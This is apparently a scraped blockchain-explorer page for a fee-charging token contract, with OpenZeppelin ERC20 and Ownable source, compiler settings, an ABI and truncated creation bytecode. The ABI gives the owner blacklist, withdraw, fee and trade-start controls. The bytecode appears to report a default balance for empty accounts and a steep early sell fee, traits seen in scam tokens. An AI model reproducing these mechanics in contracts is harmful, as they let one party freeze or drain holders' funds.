uint256 fromBalance = _balances[from];
require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
unchecked {
_balances[from] = fromBalance - amount;
}
_balances[to] += amount;
emit Transfer(from, to, amount);
_afterTokenTransfer(from, to, amount);
}
/** @dev Creates `amount` tokens and assigns them to `account`, increasing
* the total supply.
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
*/
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_beforeTokenTransfer(address(0), account, amount);
_totalSupply += amount;
_balances[account] += amount;
emit Transfer(address(0), account, amount);
_afterTokenTransfer(address(0), account, amount);
}
/**
* @dev Destroys `amount` tokens from `account`, reducing the
* total supply.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
* - `account` must have at least `amount` tokens.
*/
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: burn from the zero address");
_beforeTokenTransfer(account, address(0), amount);
uint256 accountBalance = _balances[account];
require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
unchecked {
_balances[account] = accountBalance - amount;
}
_totalSupply -= amount;
emit Transfer(account, address(0), amount);
_afterTokenTransfer(account, address(0), amount);
}
/**
* @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*/
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
/**
* @dev Spend `amount` form the allowance of `owner` toward `spender`.
*
* Does not update the allowance amount in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Might emit an {Approval} event.
*/
function _spendAllowance(
address owner,
address spender,
uint256 amount
) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
require(currentAllowance >= amount, "ERC20: insufficient allowance");
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
/**
* @dev Hook that is called before any transfer of tokens. This includes
* minting and burning.
*
* Calling conditions:
*
* - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
* will be transferred to `to`.
* - when `from` is zero, `amount` tokens will be minted for `to`.
* - when `to` is zero, `amount` of ``from``'s tokens will be burned.
* - `from` and `to` are never both zero.
*
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
function _beforeTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
/**
* @dev Hook that is called after any transfer of tokens. This includes
* minting and burning.
*
* Calling conditions:
*
* - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
* has been transferred to `to`.
* - when `from` is zero, `amount` tokens have been minted for `to`.
* - when `to` is zero, `amount` of ``from``'s tokens have been burned.
* - `from` and `to` are never both zero.
*
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
function _afterTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)
pragma solidity ^0.8.0;
import "../utils/Context.sol";
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
_;
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions anymore. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby removing any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}{
"remappings": [],
"optimizer": {
"enabled": true,
"runs": 200
},
"evmVersion": "london",
"libraries": {},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"},{"internalType":"contract IERC20","name":"usdt_","type":"address"},{"internalType":"contract IUniswapV2Router02","name":"uniswapV2Router_","type":"address"},{"internalType":"address","name":"marketingWallet_","type":"address"},{"internalType":"address","name":"buybackWallet_","type":"address"},{"internalType":"address","name":"lpReceiveWallet_","type":"address"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address[]","name":"accounts","type":"address[]"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"BatchSetBlacklist","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address[]","name":"accounts","type":"address[]"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeMultipleAccountsFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"SetBlacklist","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"usdtReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"AmountBuybackFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"AmountLpFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"AmountLpRewardFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"AmountMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_accounts","type":"address[]"},{"internalType":"bool","name":"_v","type":"bool"}],"name":"batchSetBlacklist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"burnAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"burnFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buybackFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buybackWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"dividendTracker","outputs":[{"internalType":"contract TokenDividendTracker","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_account","type":"address"},{"internalType":"bool","name":"_v","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_accounts","type":"address[]"},{"internalType":"bool","name":"_v","type":"bool"}],"name":"excludeMultipleAccountsFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"}],"name":"getExtraBuybackFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"isBlacklist","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpReceiveWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpRewardFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minPeriod","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_num","type":"uint256"}],"name":"multiSend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"resetLPRewardLastSendTime","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_v","type":"bool"}],"name":"setBlacklist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"wallet","type":"address"}],"name":"setBuybackWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"wallet","type":"address"}],"name":"setLpReceiveWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"wallet","type":"address"}],"name":"setMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"number","type":"uint256"}],"name":"setMinPeriod","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"setSwapTokensAtAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_v","type":"uint256"}],"name":"setTradeStartTime","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"},{"internalType":"uint256","name":"_num","type":"uint256"}],"name":"setinb","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradeStartTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"newValue","type":"uint256"}],"name":"updateDistributorGas","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"usdt","outputs":[{"internalType":"contract IERC20","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_token","type":"address"},{"internalType":"address payable","name":"_to","type":"address"}],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"wrap","outputs":[{"internalType":"contract Wrap","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]Contract Creation Code
6101e060408190526014610100819052600a610120526005610140819052610160919091526101805261dead6101c052600f80546001600160a01b03191660ad17905560016010556006601155610e1060175562030d4060185562004afe388190039081908339810160408190526200007891620007d6565b875188908890620000919060039060208501906200062e565b508051620000a79060049060208401906200062e565b505050620000c4620000be620003e760201b60201c565b620003eb565b6000620000da87670de0b6b3a7640000620008cd565b905062000113620f4240620000ff6001846200043d60201b6200157c1790919060201c565b6200045260201b620015881790919060201c565b6006556001600160a01b0380861660a08190529087166101a0526040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa15801562000169573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200018f9190620008ef565b6101a0516040516364e329cb60e11b81523060048201526001600160a01b03918216602482015291169063c9c65396906044016020604051808303816000875af1158015620001e2573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002089190620008ef565b6001600160a01b031660e0526101a0516040513091906200022990620006bd565b6001600160a01b03928316815291166020820152604001604051809103906000f0801580156200025d573d6000803e3d6000fd5b506001600160a01b03908116608052600b80546001600160a01b031990811687841617909155600c80548216868416179055600d80549091169184169190911790556101a051604051309190620002b490620006cb565b6001600160a01b03928316815291166020820152604001604051809103906000f080158015620002e8573d6000803e3d6000fd5b506001600160a01b031660c052620003146200030c6005546001600160a01b031690565b600162000460565b6200032130600162000460565b60c0516200033190600162000460565b6101c0516200034290600162000460565b306000908152601660205260408082208054600160ff1991821681179092557f0263c2b778d062355049effc2dece97bc6547ff8a88a3258daa512061c2153dd805482168317905560c0516001600160a01b03908116855283852080548316841790556101c0511684529190922080549091169091179055620003d8620003d16005546001600160a01b031690565b8262000547565b50505050505050505062000989565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b60006200044b8284620008cd565b9392505050565b60006200044b82846200090f565b6005546001600160a01b03163314620004c05760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6001600160a01b03821660009081526014602052604090205460ff1615158115151462000543576001600160a01b038216600081815260146020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25b5050565b6001600160a01b0382166200059f5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f2061646472657373006044820152606401620004b7565b8060026000828254620005b3919062000932565b90915550506001600160a01b03821660009081526020819052604081208054839290620005e290849062000932565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a362000543565b8280546200063c906200094d565b90600052602060002090601f016020900481019282620006605760008555620006ab565b82601f106200067b57805160ff1916838001178555620006ab565b82800160010185558215620006ab579182015b82811115620006ab5782518255916020019190600101906200068e565b50620006b9929150620006d9565b5090565b6102bb8062003b6b83390190565b610cd88062003e2683390190565b5b80821115620006b95760008155600101620006da565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200071857600080fd5b81516001600160401b0380821115620007355762000735620006f0565b604051601f8301601f19908116603f01168101908282118183101715620007605762000760620006f0565b816040528381526020925086838588010111156200077d57600080fd5b600091505b83821015620007a1578582018301518183018401529082019062000782565b83821115620007b35760008385830101525b9695505050505050565b6001600160a01b0381168114620007d357600080fd5b50565b600080600080600080600080610100898b031215620007f457600080fd5b88516001600160401b03808211156200080c57600080fd5b6200081a8c838d0162000706565b995060208b01519150808211156200083157600080fd5b50620008408b828c0162000706565b9750506040890151955060608901516200085a81620007bd565b60808a01519095506200086d81620007bd565b60a08a01519094506200088081620007bd565b60c08a01519093506200089381620007bd565b60e08a0151909250620008a681620007bd565b809150509295985092959890939650565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615620008ea57620008ea620008b7565b500290565b6000602082840312156200090257600080fd5b81516200044b81620007bd565b6000826200092d57634e487b7160e01b600052601260045260246000fd5b500490565b60008219821115620009485762000948620008b7565b500190565b600181811c908216806200096257607f821691505b6020821081036200098357634e487b7160e01b600052602260045260246000fd5b50919050565b60805160a05160c05160e05161010051610120516101405161016051610180516101a0516101c05161307b62000af06000396000818161074101526123a8015260008181610539015281816120a2015281816121890152818161224b0152818161264e0152818161278901528181612895015281816129630152612a1d0152600081816105f801526124fa0152600081816106b901526124970152600081816106ed01526123e7015260008181610a8d015261237c015260008181610813015261243f01526000818161062c01528181610b5b015281816118d301528181611a0301528181611add0152611fe60152600081816104ef01528181610cd201528181611a5901528181611b3301528181611c2401528181611ccf01526120d1015260008181610419015281816126a6015281816126e201528181612931015281816129d90152612a6f01526000818161095d015281816127160152612801015261307b6000f3fe60806040526004361061031e5760003560e01c806370d5ae05116101ab578063b2dfeb6b116100f7578063deab8aea11610095578063f82107691161006f578063f821076914610a3b578063f940e38514610a5b578063fce589d814610a7b578063ffd49c8414610aaf57600080fd5b8063deab8aea146109e5578063e2f4560514610a05578063f2fde38b14610a1b57600080fd5b8063cfe0e619116100d1578063cfe0e61914610935578063d46eb1191461094b578063d4e2799a1461097f578063dd62ed3e1461099f57600080fd5b8063b2dfeb6b146108d5578063c0246668146108f5578063c492f0461461091557600080fd5b806395d89b4111610164578063a457c2d71161013e578063a457c2d714610855578063a9059cbb14610875578063af9c53da14610895578063afa4f3b2146108b557600080fd5b806395d89b41146107ec5780639e285bc214610801578063a0b2e1f11461083557600080fd5b806370d5ae051461072f578063715018a61461076357806375f0a874146107785780637d3e3d17146107985780638da5cb5b146107b85780638f2cd2fa146107d657600080fd5b80632c735ef81161026a5780633b2d081c116102235780635d098b38116101fd5780635d098b38146106875780636b67c4df146106a7578063704ce43e146106db57806370a082311461070f57600080fd5b80633b2d081c146105e657806349bd5a5e1461061a5780634fbee1931461064e57600080fd5b80632c735ef8146105115780632f48ab7d14610527578063313ce5671461055b578063333e99db1461057757806336d11c26146105b057806339509351146105c657600080fd5b80631694505e116102d75780631f888ad8116102b15780631f888ad81461048857806323b872dd1461049d5780632bbff348146104bd5780632c1f5216146104dd57600080fd5b80631694505e1461040757806318160ddd146104535780631d0adc071461046857600080fd5b806301c5e3321461032a57806306fdde031461035357806308e6bc5514610375578063095ea7b3146103955780630dd0cc7d146103c5578063153b0d1e146103e757600080fd5b3661032557005b600080fd5b34801561033657600080fd5b50610340600a5481565b6040519081526020015b60405180910390f35b34801561035f57600080fd5b50610368610ac5565b60405161034a9190612ae8565b34801561038157600080fd5b50610340610390366004612b52565b610b57565b3480156103a157600080fd5b506103b56103b0366004612b6f565b610bca565b604051901515815260200161034a565b3480156103d157600080fd5b506103e56103e0366004612b9b565b610be4565b005b3480156103f357600080fd5b506103e5610402366004612bcb565b610c22565b34801561041357600080fd5b5061043b7f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b03909116815260200161034a565b34801561045f57600080fd5b50600254610340565b34801561047457600080fd5b506103e5610483366004612b52565b610c5a565b34801561049457600080fd5b506103e5610ca6565b3480156104a957600080fd5b506103b56104b8366004612c04565b610d45565b3480156104c957600080fd5b50600d5461043b906001600160a01b031681565b3480156104e957600080fd5b5061043b7f000000000000000000000000000000000000000000000000000000000000000081565b34801561051d57600080fd5b50610340600e5481565b34801561053357600080fd5b5061043b7f000000000000000000000000000000000000000000000000000000000000000081565b34801561056757600080fd5b506040516012815260200161034a565b34801561058357600080fd5b506103b5610592366004612b52565b6001600160a01b031660009081526015602052604090205460ff1690565b3480156105bc57600080fd5b5061034060095481565b3480156105d257600080fd5b506103b56105e1366004612b6f565b610d69565b3480156105f257600080fd5b506103407f000000000000000000000000000000000000000000000000000000000000000081565b34801561062657600080fd5b5061043b7f000000000000000000000000000000000000000000000000000000000000000081565b34801561065a57600080fd5b506103b5610669366004612b52565b6001600160a01b031660009081526014602052604090205460ff1690565b34801561069357600080fd5b506103e56106a2366004612b52565b610da8565b3480156106b357600080fd5b506103407f000000000000000000000000000000000000000000000000000000000000000081565b3480156106e757600080fd5b506103407f000000000000000000000000000000000000000000000000000000000000000081565b34801561071b57600080fd5b5061034061072a366004612b52565b610df4565b34801561073b57600080fd5b5061043b7f000000000000000000000000000000000000000000000000000000000000000081565b34801561076f57600080fd5b506103e5610e32565b34801561078457600080fd5b50600b5461043b906001600160a01b031681565b3480156107a457600080fd5b506103e56107b3366004612c45565b610e68565b3480156107c457600080fd5b506005546001600160a01b031661043b565b3480156107e257600080fd5b5061034060075481565b3480156107f857600080fd5b50610368610e9e565b34801561080d57600080fd5b506103407f000000000000000000000000000000000000000000000000000000000000000081565b34801561084157600080fd5b506103e5610850366004612c45565b610ead565b34801561086157600080fd5b506103b5610870366004612b6f565b610edc565b34801561088157600080fd5b506103b5610890366004612b6f565b610f6e565b3480156108a157600080fd5b506103e56108b0366004612c5e565b610f7c565b3480156108c157600080fd5b506103e56108d0366004612c45565b611058565b3480156108e157600080fd5b506103e56108f0366004612b52565b611087565b34801561090157600080fd5b506103e5610910366004612bcb565b6110d3565b34801561092157600080fd5b506103e5610930366004612c5e565b611183565b34801561094157600080fd5b5061034060085481565b34801561095757600080fd5b5061043b7f000000000000000000000000000000000000000000000000000000000000000081565b34801561098b57600080fd5b506103e561099a366004612c45565b611252565b3480156109ab57600080fd5b506103406109ba366004612ce4565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b3480156109f157600080fd5b50600c5461043b906001600160a01b031681565b348015610a1157600080fd5b5061034060065481565b348015610a2757600080fd5b506103e5610a36366004612b52565b611362565b348015610a4757600080fd5b506103e5610a56366004612c45565b6113fa565b348015610a6757600080fd5b506103e5610a76366004612ce4565b611429565b348015610a8757600080fd5b506103407f000000000000000000000000000000000000000000000000000000000000000081565b348015610abb57600080fd5b5061034060175481565b606060038054610ad490612d12565b80601f0160208091040260200160405190810160405280929190818152602001828054610b0090612d12565b8015610b4d5780601f10610b2257610100808354040283529160200191610b4d565b820191906000526020600020905b815481529060010190602001808311610b3057829003601f168201915b5050505050905090565b60007f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316826001600160a01b0316148015610b9c57506000600e54115b8015610bb55750600e54610bb290610708611594565b42105b15610bc2575060f0919050565b506000919050565b600033610bd88185856115a0565b60019150505b92915050565b6005546001600160a01b03163314610c175760405162461bcd60e51b8152600401610c0e90612d4c565b60405180910390fd5b601091909155601155565b6005546001600160a01b03163314610c4c5760405162461bcd60e51b8152600401610c0e90612d4c565b610c5682826116c4565b5050565b6005546001600160a01b03163314610c845760405162461bcd60e51b8152600401610c0e90612d4c565b600c80546001600160a01b0319166001600160a01b0392909216919091179055565b6005546001600160a01b03163314610cd05760405162461bcd60e51b8152600401610c0e90612d4c565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316631f888ad86040518163ffffffff1660e01b8152600401600060405180830381600087803b158015610d2b57600080fd5b505af1158015610d3f573d6000803e3d6000fd5b50505050565b600033610d53858285611742565b610d5e8585856117ce565b506001949350505050565b3360008181526001602090815260408083206001600160a01b0387168452909152812054909190610bd89082908690610da3908790612d97565b6115a0565b6005546001600160a01b03163314610dd25760405162461bcd60e51b8152600401610c0e90612d4c565b600b80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0381166000818152602081905260408120549091610e195792915050565b60008111610e2957601054610e2b565b805b9392505050565b6005546001600160a01b03163314610e5c5760405162461bcd60e51b8152600401610c0e90612d4c565b610e666000611d36565b565b6005546001600160a01b03163314610e925760405162461bcd60e51b8152600401610c0e90612d4c565b610e9b81611d88565b50565b606060048054610ad490612d12565b6005546001600160a01b03163314610ed75760405162461bcd60e51b8152600401610c0e90612d4c565b600e55565b3360008181526001602090815260408083206001600160a01b038716845290915281205490919083811015610f615760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610c0e565b610d5e82868684036115a0565b600033610bd88185856117ce565b6005546001600160a01b03163314610fa65760405162461bcd60e51b8152600401610c0e90612d4c565b60005b82811015611017578160156000868685818110610fc857610fc8612daf565b9050602002016020810190610fdd9190612b52565b6001600160a01b031681526020810191909152604001600020805460ff19169115159190911790558061100f81612dc5565b915050610fa9565b507f7472bf178ecdf44b66086e67637786c0f1c841e08c3d702843042fdb98443dcb83838360405161104b93929190612dde565b60405180910390a1505050565b6005546001600160a01b031633146110825760405162461bcd60e51b8152600401610c0e90612d4c565b600655565b6005546001600160a01b031633146110b15760405162461bcd60e51b8152600401610c0e90612d4c565b600d80546001600160a01b0319166001600160a01b0392909216919091179055565b6005546001600160a01b031633146110fd5760405162461bcd60e51b8152600401610c0e90612d4c565b6001600160a01b03821660009081526014602052604090205460ff16151581151514610c56576001600160a01b038216600081815260146020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df791015b60405180910390a25050565b6005546001600160a01b031633146111ad5760405162461bcd60e51b8152600401610c0e90612d4c565b60005b8281101561121e5781601460008686858181106111cf576111cf612daf565b90506020020160208101906111e49190612b52565b6001600160a01b031681526020810191909152604001600020805460ff19169115159190911790558061121681612dc5565b9150506111b0565b507f7fdaf542373fa84f4ee8d662c642f44e4c2276a217d7d29e548b6eb29a233b3583838360405161104b93929190612dde565b6005546001600160a01b0316331461127c5760405162461bcd60e51b8152600401610c0e90612d4c565b620186a0811015801561129257506207a1208111155b6112f95760405162461bcd60e51b815260206004820152603260248201527f6469737472696275746f72476173206d757374206265206265747765656e2032604482015271030302c30303020616e64203530302c3030360741b6064820152608401610c0e565b601854810361135d5760405162461bcd60e51b815260206004820152602a60248201527f43616e6e6f7420757064617465206469737472696275746f7247617320746f2060448201526973616d652076616c756560b01b6064820152608401610c0e565b601855565b6005546001600160a01b0316331461138c5760405162461bcd60e51b8152600401610c0e90612d4c565b6001600160a01b0381166113f15760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610c0e565b610e9b81611d36565b6005546001600160a01b031633146114245760405162461bcd60e51b8152600401610c0e90612d4c565b601755565b6005546001600160a01b031633146114535760405162461bcd60e51b8152600401610c0e90612d4c565b6001600160a01b03821661149b576040516001600160a01b038216904780156108fc02916000818181858888f19350505050158015611496573d6000803e3d6000fd5b505050565b6040516370a0823160e01b81523060048201526001600160a01b0383169063a9059cbb90839083906370a